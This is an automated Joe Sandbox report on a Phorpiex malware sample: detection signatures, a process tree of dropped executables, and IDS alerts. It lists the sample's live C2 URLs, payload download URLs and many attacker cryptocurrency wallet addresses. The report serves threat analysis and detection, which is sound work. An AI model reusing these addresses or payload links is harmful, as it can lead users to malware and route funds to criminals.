Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1512821
MD5:ababca6d12d96e8dd2f1d7114b406fae
SHA1:dcd9798e83ec688aacb3de8911492a232cb41a32
SHA256:a992920e64a64763f3dd8c2a431a0f5e56e5b3782a1496de92bc80ee71cca5ba
Tags:exePhorpiex
Infos:

Detection

Phorpiex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Phorpiex
AI detected suspicious sample
Changes security center settings (notifications, updates, antivirus, firewall)
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Abnormal high CPU Usage
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\file.exe" MD5: ABABCA6D12D96E8DD2F1D7114B406FAE)
    • sysmablsvr.exe (PID: 6768 cmdline: C:\Windows\sysmablsvr.exe MD5: ABABCA6D12D96E8DD2F1D7114B406FAE)
      • 158752420.exe (PID: 3384 cmdline: C:\Users\user\AppData\Local\Temp\158752420.exe MD5: 8242045FF6B7BED00C8A94C77193F2DE)
      • 524024912.exe (PID: 332 cmdline: C:\Users\user\AppData\Local\Temp\524024912.exe MD5: AC0A159A6C219E2CEA55DCC77AB6E337)
      • 259428477.exe (PID: 504 cmdline: C:\Users\user\AppData\Local\Temp\259428477.exe MD5: 8242045FF6B7BED00C8A94C77193F2DE)
      • 2958729589.exe (PID: 1260 cmdline: C:\Users\user\AppData\Local\Temp\2958729589.exe MD5: 8242045FF6B7BED00C8A94C77193F2DE)
  • sysmablsvr.exe (PID: 2148 cmdline: "C:\Windows\sysmablsvr.exe" MD5: ABABCA6D12D96E8DD2F1D7114B406FAE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
PhorpiexProofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex

Malware Configuration

Threatname: Phorpiex

{"C2 url": ["http://185.215.113.66/", "http://77.91.77.92/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "17hgMFyLDwMjxWqw5GhijhnPdJDyFDqecY", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "bnb1epx67ne4vckqmaj4gwke8m322f4yjr6eh52wqw", "band1f05d98dvehkecw6ex3yd4pxqssw3uemx09sg2n", "bc1qmpkehfffkr6phuklsksnd7nhgx0369sxu772m3", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Ge7amzjabAHdubjUYS2Cw84hNScLVRHmHg", "EQDYiebztC06Lpo9y1-m-g_bOsJ2KN3I-1mOgllNNIlIPZLi", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\sysmablsvr.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000001.00000000.1804968685.0000000000410000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
        00000000.00000000.1784055994.0000000000410000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
          00000002.00000000.1909749196.0000000000410000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
            00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
              00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                Click to see the 5 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                2.0.sysmablsvr.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                  1.2.sysmablsvr.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                    0.2.file.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                      2.2.sysmablsvr.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                        0.0.file.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                          Click to see the 1 entries

                          Sigma Signatures

                          Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysmablsvr.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 6672, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-09-17T23:09:18.095591+020020440771A Network Trojan was detected192.168.2.45914584.54.122.1440500UDP
                          2024-09-17T23:09:23.161855+020020440771A Network Trojan was detected192.168.2.459145178.151.4.20940500UDP
                          2024-09-17T23:09:33.235648+020020440771A Network Trojan was detected192.168.2.4591452.189.25.17640500UDP
                          2024-09-17T23:09:38.241849+020020440771A Network Trojan was detected192.168.2.45914586.102.56.22640500UDP
                          2024-09-17T23:09:43.241812+020020440771A Network Trojan was detected192.168.2.4591452.190.124.2340500UDP
                          2024-09-17T23:09:58.255064+020020440771A Network Trojan was detected192.168.2.459145105.106.52.9740500UDP
                          2024-09-17T23:10:03.308803+020020440771A Network Trojan was detected192.168.2.459145217.30.170.1040500UDP
                          2024-09-17T23:10:08.302854+020020440771A Network Trojan was detected192.168.2.459145217.30.162.3740500UDP
                          2024-09-17T23:10:13.319220+020020440771A Network Trojan was detected192.168.2.45914581.195.238.13040500UDP
                          2024-09-17T23:10:23.335541+020020440771A Network Trojan was detected192.168.2.45914546.100.121.14640500UDP
                          2024-09-17T23:10:28.348342+020020440771A Network Trojan was detected192.168.2.45914537.255.23.10040500UDP
                          2024-09-17T23:10:38.364094+020020440771A Network Trojan was detected192.168.2.459145178.253.109.19540500UDP
                          2024-09-17T23:10:43.380318+020020440771A Network Trojan was detected192.168.2.4591455.236.253.12440500UDP
                          2024-09-17T23:10:48.397244+020020440771A Network Trojan was detected192.168.2.459145213.230.127.21340500UDP
                          2024-09-17T23:10:58.514941+020020440771A Network Trojan was detected192.168.2.45914589.43.145.1840500UDP
                          2024-09-17T23:11:03.520358+020020440771A Network Trojan was detected192.168.2.45914579.165.23.13140500UDP
                          2024-09-17T23:11:13.541304+020020440771A Network Trojan was detected192.168.2.459145151.240.79.13340500UDP
                          2024-09-17T23:11:23.570592+020020440771A Network Trojan was detected192.168.2.459145178.88.111.2040500UDP
                          2024-09-17T23:12:18.707808+020020440771A Network Trojan was detected192.168.2.4591452.185.144.15740500UDP
                          2024-09-17T23:12:23.724097+020020440771A Network Trojan was detected192.168.2.45914578.39.225.2740500UDP
                          2024-09-17T23:12:28.739574+020020440771A Network Trojan was detected192.168.2.45914537.228.65.18540500UDP
                          2024-09-17T23:12:38.848779+020020440771A Network Trojan was detected192.168.2.459145149.54.47.9040500UDP
                          2024-09-17T23:12:53.879963+020020440771A Network Trojan was detected192.168.2.459145188.215.175.8940500UDP
                          2024-09-17T23:12:58.897691+020020440771A Network Trojan was detected192.168.2.459145100.109.48.4340500UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-09-17T23:09:16.259431+020028032742Potentially Bad Traffic192.168.2.449730185.215.113.6680TCP
                          2024-09-17T23:09:17.984779+020028032742Potentially Bad Traffic192.168.2.449732185.215.113.6680TCP
                          2024-09-17T23:09:23.386341+020028032742Potentially Bad Traffic192.168.2.449734185.215.113.6680TCP
                          2024-09-17T23:09:25.665035+020028032742Potentially Bad Traffic192.168.2.449734185.215.113.6680TCP
                          2024-09-17T23:09:27.916077+020028032742Potentially Bad Traffic192.168.2.449734185.215.113.6680TCP
                          2024-09-17T23:09:30.163885+020028032742Potentially Bad Traffic192.168.2.449734185.215.113.6680TCP
                          2024-09-17T23:09:32.414765+020028032742Potentially Bad Traffic192.168.2.449734185.215.113.6680TCP
                          2024-09-17T23:09:37.130578+020028032742Potentially Bad Traffic192.168.2.44973877.91.77.9280TCP
                          2024-09-17T23:09:40.900663+020028032742Potentially Bad Traffic192.168.2.44974177.91.77.9280TCP
                          2024-09-17T23:09:44.587314+020028032742Potentially Bad Traffic192.168.2.44974377.91.77.9280TCP
                          2024-09-17T23:09:48.275269+020028032742Potentially Bad Traffic192.168.2.44974477.91.77.9280TCP
                          2024-09-17T23:09:52.012408+020028032742Potentially Bad Traffic192.168.2.44974577.91.77.9280TCP
                          2024-09-17T23:09:55.742140+020028032742Potentially Bad Traffic192.168.2.44974677.91.77.9280TCP
                          2024-09-17T23:09:59.523347+020028032742Potentially Bad Traffic192.168.2.44974891.202.233.14180TCP
                          2024-09-17T23:10:01.236543+020028032742Potentially Bad Traffic192.168.2.44974991.202.233.14180TCP
                          2024-09-17T23:10:07.663501+020028032742Potentially Bad Traffic192.168.2.44974991.202.233.14180TCP
                          2024-09-17T23:10:10.219426+020028032742Potentially Bad Traffic192.168.2.44975191.202.233.14180TCP
                          2024-09-17T23:10:16.643936+020028032742Potentially Bad Traffic192.168.2.44975291.202.233.14180TCP
                          2024-09-17T23:10:16.846309+020028032742Potentially Bad Traffic192.168.2.44975191.202.233.14180TCP
                          2024-09-17T23:10:19.905577+020028032742Potentially Bad Traffic192.168.2.44975191.202.233.14180TCP
                          2024-09-17T23:10:22.671072+020028032742Potentially Bad Traffic192.168.2.44975491.202.233.14180TCP
                          2024-09-17T23:10:25.439810+020028032742Potentially Bad Traffic192.168.2.44975691.202.233.14180TCP
                          2024-09-17T23:10:29.317891+020028032742Potentially Bad Traffic192.168.2.449758185.215.113.6680TCP
                          2024-09-17T23:10:31.032415+020028032742Potentially Bad Traffic192.168.2.449759185.215.113.6680TCP
                          2024-09-17T23:10:37.676890+020028032742Potentially Bad Traffic192.168.2.449762185.215.113.6680TCP
                          2024-09-17T23:10:40.456563+020028032742Potentially Bad Traffic192.168.2.449764185.215.113.6680TCP
                          2024-09-17T23:10:43.194117+020028032742Potentially Bad Traffic192.168.2.449766185.215.113.6680TCP
                          2024-09-17T23:10:46.044400+020028032742Potentially Bad Traffic192.168.2.449767185.215.113.6680TCP
                          2024-09-17T23:10:48.784910+020028032742Potentially Bad Traffic192.168.2.449769185.215.113.6680TCP
                          2024-09-17T23:10:53.491643+020028032742Potentially Bad Traffic192.168.2.44977077.91.77.9280TCP
                          2024-09-17T23:10:57.334445+020028032742Potentially Bad Traffic192.168.2.44977277.91.77.9280TCP
                          2024-09-17T23:11:01.041077+020028032742Potentially Bad Traffic192.168.2.44977477.91.77.9280TCP
                          2024-09-17T23:11:04.737217+020028032742Potentially Bad Traffic192.168.2.44977677.91.77.9280TCP
                          2024-09-17T23:11:08.444057+020028032742Potentially Bad Traffic192.168.2.44977777.91.77.9280TCP
                          2024-09-17T23:11:12.115917+020028032742Potentially Bad Traffic192.168.2.44977977.91.77.9280TCP
                          2024-09-17T23:11:16.142994+020028032742Potentially Bad Traffic192.168.2.44978191.202.233.14180TCP
                          2024-09-17T23:11:17.859805+020028032742Potentially Bad Traffic192.168.2.44978291.202.233.14180TCP
                          2024-09-17T23:11:24.665171+020028032742Potentially Bad Traffic192.168.2.44978591.202.233.14180TCP
                          2024-09-17T23:11:27.404856+020028032742Potentially Bad Traffic192.168.2.44978691.202.233.14180TCP
                          2024-09-17T23:11:30.236762+020028032742Potentially Bad Traffic192.168.2.44978891.202.233.14180TCP
                          2024-09-17T23:11:33.050771+020028032742Potentially Bad Traffic192.168.2.44978991.202.233.14180TCP
                          2024-09-17T23:11:35.900980+020028032742Potentially Bad Traffic192.168.2.44979191.202.233.14180TCP
                          2024-09-17T23:11:39.986361+020028032742Potentially Bad Traffic192.168.2.449793185.215.113.6680TCP
                          2024-09-17T23:11:41.832654+020028032742Potentially Bad Traffic192.168.2.449794185.215.113.6680TCP
                          2024-09-17T23:11:47.503983+020028032742Potentially Bad Traffic192.168.2.449797185.215.113.6680TCP
                          2024-09-17T23:11:50.288976+020028032742Potentially Bad Traffic192.168.2.449799185.215.113.6680TCP
                          2024-09-17T23:11:53.080321+020028032742Potentially Bad Traffic192.168.2.449800185.215.113.6680TCP
                          2024-09-17T23:11:55.821523+020028032742Potentially Bad Traffic192.168.2.449802185.215.113.6680TCP
                          2024-09-17T23:11:58.781922+020028032742Potentially Bad Traffic192.168.2.449803185.215.113.6680TCP
                          2024-09-17T23:12:03.475094+020028032742Potentially Bad Traffic192.168.2.44980577.91.77.9280TCP
                          2024-09-17T23:12:07.188452+020028032742Potentially Bad Traffic192.168.2.44980777.91.77.9280TCP
                          2024-09-17T23:12:10.900881+020028032742Potentially Bad Traffic192.168.2.44980977.91.77.9280TCP
                          2024-09-17T23:12:14.779580+020028032742Potentially Bad Traffic192.168.2.44981077.91.77.9280TCP
                          2024-09-17T23:12:18.495368+020028032742Potentially Bad Traffic192.168.2.44981277.91.77.9280TCP
                          2024-09-17T23:12:22.405916+020028032742Potentially Bad Traffic192.168.2.44981477.91.77.9280TCP
                          2024-09-17T23:12:26.510035+020028032742Potentially Bad Traffic192.168.2.44981691.202.233.14180TCP
                          2024-09-17T23:12:28.823664+020028032742Potentially Bad Traffic192.168.2.44981791.202.233.14180TCP
                          2024-09-17T23:12:35.986822+020028032742Potentially Bad Traffic192.168.2.44982091.202.233.14180TCP
                          2024-09-17T23:12:38.729098+020028032742Potentially Bad Traffic192.168.2.44982191.202.233.14180TCP
                          2024-09-17T23:12:41.467262+020028032742Potentially Bad Traffic192.168.2.44982391.202.233.14180TCP
                          2024-09-17T23:12:44.777939+020028032742Potentially Bad Traffic192.168.2.44982591.202.233.14180TCP
                          2024-09-17T23:12:47.533845+020028032742Potentially Bad Traffic192.168.2.44982691.202.233.14180TCP
                          2024-09-17T23:12:51.407501+020028032742Potentially Bad Traffic192.168.2.449828185.215.113.6680TCP
                          2024-09-17T23:12:54.150335+020028032742Potentially Bad Traffic192.168.2.449829185.215.113.6680TCP
                          2024-09-17T23:12:56.871465+020028032742Potentially Bad Traffic192.168.2.449831185.215.113.6680TCP
                          2024-09-17T23:12:59.607090+020028032742Potentially Bad Traffic192.168.2.449832185.215.113.6680TCP
                          2024-09-17T23:13:02.354191+020028032742Potentially Bad Traffic192.168.2.449834185.215.113.6680TCP
                          2024-09-17T23:13:05.072325+020028032742Potentially Bad Traffic192.168.2.449836185.215.113.6680TCP
                          2024-09-17T23:13:09.923770+020028032742Potentially Bad Traffic192.168.2.44983777.91.77.9280TCP
                          2024-09-17T23:13:13.779440+020028032742Potentially Bad Traffic192.168.2.44983977.91.77.9280TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-09-17T23:09:15.563777+020028376771A Network Trojan was detected185.215.113.6680192.168.2.449793TCP
                          2024-09-17T23:11:43.982652+020028376771A Network Trojan was detected185.215.113.6680192.168.2.449794TCP
                          2024-09-17T23:11:46.807316+020028376771A Network Trojan was detected185.215.113.6680192.168.2.449796TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-09-17T23:09:16.259431+020028482951A Network Trojan was detected192.168.2.449730185.215.113.6680TCP
                          2024-09-17T23:09:17.984779+020028482951A Network Trojan was detected192.168.2.449732185.215.113.6680TCP
                          2024-09-17T23:09:23.386341+020028482951A Network Trojan was detected192.168.2.449734185.215.113.6680TCP
                          2024-09-17T23:09:25.665035+020028482951A Network Trojan was detected192.168.2.449734185.215.113.6680TCP
                          2024-09-17T23:09:27.916077+020028482951A Network Trojan was detected192.168.2.449734185.215.113.6680TCP
                          2024-09-17T23:09:30.163885+020028482951A Network Trojan was detected192.168.2.449734185.215.113.6680TCP
                          2024-09-17T23:09:32.414765+020028482951A Network Trojan was detected192.168.2.449734185.215.113.6680TCP
                          2024-09-17T23:09:37.130578+020028482951A Network Trojan was detected192.168.2.44973877.91.77.9280TCP
                          2024-09-17T23:09:40.900663+020028482951A Network Trojan was detected192.168.2.44974177.91.77.9280TCP
                          2024-09-17T23:09:44.587314+020028482951A Network Trojan was detected192.168.2.44974377.91.77.9280TCP
                          2024-09-17T23:09:48.275269+020028482951A Network Trojan was detected192.168.2.44974477.91.77.9280TCP
                          2024-09-17T23:09:52.012408+020028482951A Network Trojan was detected192.168.2.44974577.91.77.9280TCP
                          2024-09-17T23:09:55.742140+020028482951A Network Trojan was detected192.168.2.44974677.91.77.9280TCP
                          2024-09-17T23:09:59.523347+020028482951A Network Trojan was detected192.168.2.44974891.202.233.14180TCP
                          2024-09-17T23:10:01.236543+020028482951A Network Trojan was detected192.168.2.44974991.202.233.14180TCP
                          2024-09-17T23:10:07.663501+020028482951A Network Trojan was detected192.168.2.44974991.202.233.14180TCP
                          2024-09-17T23:10:10.219426+020028482951A Network Trojan was detected192.168.2.44975191.202.233.14180TCP
                          2024-09-17T23:10:16.846309+020028482951A Network Trojan was detected192.168.2.44975191.202.233.14180TCP
                          2024-09-17T23:10:19.905577+020028482951A Network Trojan was detected192.168.2.44975191.202.233.14180TCP
                          2024-09-17T23:10:22.671072+020028482951A Network Trojan was detected192.168.2.44975491.202.233.14180TCP
                          2024-09-17T23:10:25.439810+020028482951A Network Trojan was detected192.168.2.44975691.202.233.14180TCP
                          2024-09-17T23:10:29.317891+020028482951A Network Trojan was detected192.168.2.449758185.215.113.6680TCP
                          2024-09-17T23:10:31.032415+020028482951A Network Trojan was detected192.168.2.449759185.215.113.6680TCP
                          2024-09-17T23:10:37.676890+020028482951A Network Trojan was detected192.168.2.449762185.215.113.6680TCP
                          2024-09-17T23:10:40.456563+020028482951A Network Trojan was detected192.168.2.449764185.215.113.6680TCP
                          2024-09-17T23:10:43.194117+020028482951A Network Trojan was detected192.168.2.449766185.215.113.6680TCP
                          2024-09-17T23:10:46.044400+020028482951A Network Trojan was detected192.168.2.449767185.215.113.6680TCP
                          2024-09-17T23:10:48.784910+020028482951A Network Trojan was detected192.168.2.449769185.215.113.6680TCP
                          2024-09-17T23:10:53.491643+020028482951A Network Trojan was detected192.168.2.44977077.91.77.9280TCP
                          2024-09-17T23:10:57.334445+020028482951A Network Trojan was detected192.168.2.44977277.91.77.9280TCP
                          2024-09-17T23:11:01.041077+020028482951A Network Trojan was detected192.168.2.44977477.91.77.9280TCP
                          2024-09-17T23:11:04.737217+020028482951A Network Trojan was detected192.168.2.44977677.91.77.9280TCP
                          2024-09-17T23:11:08.444057+020028482951A Network Trojan was detected192.168.2.44977777.91.77.9280TCP
                          2024-09-17T23:11:12.115917+020028482951A Network Trojan was detected192.168.2.44977977.91.77.9280TCP
                          2024-09-17T23:11:16.142994+020028482951A Network Trojan was detected192.168.2.44978191.202.233.14180TCP
                          2024-09-17T23:11:17.859805+020028482951A Network Trojan was detected192.168.2.44978291.202.233.14180TCP
                          2024-09-17T23:11:24.665171+020028482951A Network Trojan was detected192.168.2.44978591.202.233.14180TCP
                          2024-09-17T23:11:27.404856+020028482951A Network Trojan was detected192.168.2.44978691.202.233.14180TCP
                          2024-09-17T23:11:30.236762+020028482951A Network Trojan was detected192.168.2.44978891.202.233.14180TCP
                          2024-09-17T23:11:33.050771+020028482951A Network Trojan was detected192.168.2.44978991.202.233.14180TCP
                          2024-09-17T23:11:35.900980+020028482951A Network Trojan was detected192.168.2.44979191.202.233.14180TCP
                          2024-09-17T23:11:39.986361+020028482951A Network Trojan was detected192.168.2.449793185.215.113.6680TCP
                          2024-09-17T23:11:41.832654+020028482951A Network Trojan was detected192.168.2.449794185.215.113.6680TCP
                          2024-09-17T23:11:47.503983+020028482951A Network Trojan was detected192.168.2.449797185.215.113.6680TCP
                          2024-09-17T23:11:50.288976+020028482951A Network Trojan was detected192.168.2.449799185.215.113.6680TCP
                          2024-09-17T23:11:53.080321+020028482951A Network Trojan was detected192.168.2.449800185.215.113.6680TCP
                          2024-09-17T23:11:55.821523+020028482951A Network Trojan was detected192.168.2.449802185.215.113.6680TCP
                          2024-09-17T23:11:58.781922+020028482951A Network Trojan was detected192.168.2.449803185.215.113.6680TCP
                          2024-09-17T23:12:03.475094+020028482951A Network Trojan was detected192.168.2.44980577.91.77.9280TCP
                          2024-09-17T23:12:07.188452+020028482951A Network Trojan was detected192.168.2.44980777.91.77.9280TCP
                          2024-09-17T23:12:10.900881+020028482951A Network Trojan was detected192.168.2.44980977.91.77.9280TCP
                          2024-09-17T23:12:14.779580+020028482951A Network Trojan was detected192.168.2.44981077.91.77.9280TCP
                          2024-09-17T23:12:18.495368+020028482951A Network Trojan was detected192.168.2.44981277.91.77.9280TCP
                          2024-09-17T23:12:22.405916+020028482951A Network Trojan was detected192.168.2.44981477.91.77.9280TCP
                          2024-09-17T23:12:26.510035+020028482951A Network Trojan was detected192.168.2.44981691.202.233.14180TCP
                          2024-09-17T23:12:28.823664+020028482951A Network Trojan was detected192.168.2.44981791.202.233.14180TCP
                          2024-09-17T23:12:35.986822+020028482951A Network Trojan was detected192.168.2.44982091.202.233.14180TCP
                          2024-09-17T23:12:38.729098+020028482951A Network Trojan was detected192.168.2.44982191.202.233.14180TCP
                          2024-09-17T23:12:41.467262+020028482951A Network Trojan was detected192.168.2.44982391.202.233.14180TCP
                          2024-09-17T23:12:44.777939+020028482951A Network Trojan was detected192.168.2.44982591.202.233.14180TCP
                          2024-09-17T23:12:47.533845+020028482951A Network Trojan was detected192.168.2.44982691.202.233.14180TCP
                          2024-09-17T23:12:51.407501+020028482951A Network Trojan was detected192.168.2.449828185.215.113.6680TCP
                          2024-09-17T23:12:54.150335+020028482951A Network Trojan was detected192.168.2.449829185.215.113.6680TCP
                          2024-09-17T23:12:56.871465+020028482951A Network Trojan was detected192.168.2.449831185.215.113.6680TCP
                          2024-09-17T23:12:59.607090+020028482951A Network Trojan was detected192.168.2.449832185.215.113.6680TCP
                          2024-09-17T23:13:02.354191+020028482951A Network Trojan was detected192.168.2.449834185.215.113.6680TCP
                          2024-09-17T23:13:05.072325+020028482951A Network Trojan was detected192.168.2.449836185.215.113.6680TCP
                          2024-09-17T23:13:09.923770+020028482951A Network Trojan was detected192.168.2.44983777.91.77.9280TCP
                          2024-09-17T23:13:13.779440+020028482951A Network Trojan was detected192.168.2.44983977.91.77.9280TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: file.exeAvira: detected
                          Antivirus detection for URL or domain
                          Source: http://77.91.77.92/4Avira URL Cloud: Label: malware
                          Source: http://twizt.net/chnlk6.exeAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk11.exeAvira URL Cloud: Label: phishing
                          Source: http://91.202.233.141/lknet.exeAvira URL Cloud: Label: malware
                          Source: http://77.91.77.92/6Avira URL Cloud: Label: malware
                          Source: http://twizt.net/chnlk20.exeAvira URL Cloud: Label: phishing
                          Source: http://91.202.233.141/2Avira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk7.exeAvira URL Cloud: Label: phishing
                          Source: http://91.202.233.141/PLTRESAAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk10.exeAvira URL Cloud: Label: phishing
                          Source: http://91.202.233.141/1Avira URL Cloud: Label: malware
                          Source: http://91.202.233.141/5Avira URL Cloud: Label: phishing
                          Source: http://91.202.233.141/4Avira URL Cloud: Label: phishing
                          Source: http://91.202.233.141/6Avira URL Cloud: Label: phishing
                          Source: http://91.202.233.141/3Avira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk4.exeAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk5.exeAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk16.exeAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk15.exeAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk2.exeAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk17.exeAvira URL Cloud: Label: phishing
                          Source: http://185.215.113.66/6Avira URL Cloud: Label: malware
                          Source: http://twizt.net/chnlk18.exeAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk3.exeAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk14.exeAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk8.exeAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk13.exeAvira URL Cloud: Label: phishing
                          Source: http://91.202.233.141/6.Avira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk19.exeAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk9.exeAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk12.exeAvira URL Cloud: Label: phishing
                          Source: http://twizt.net/chnlk1.exeAvira URL Cloud: Label: phishing
                          Antivirus detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\524024912.exeAvira: detection malicious, Label: TR/Dldr.Agent.gqemd
                          Source: C:\Windows\sysmablsvr.exeAvira: detection malicious, Label: HEUR/AGEN.1315882
                          Found malware configuration
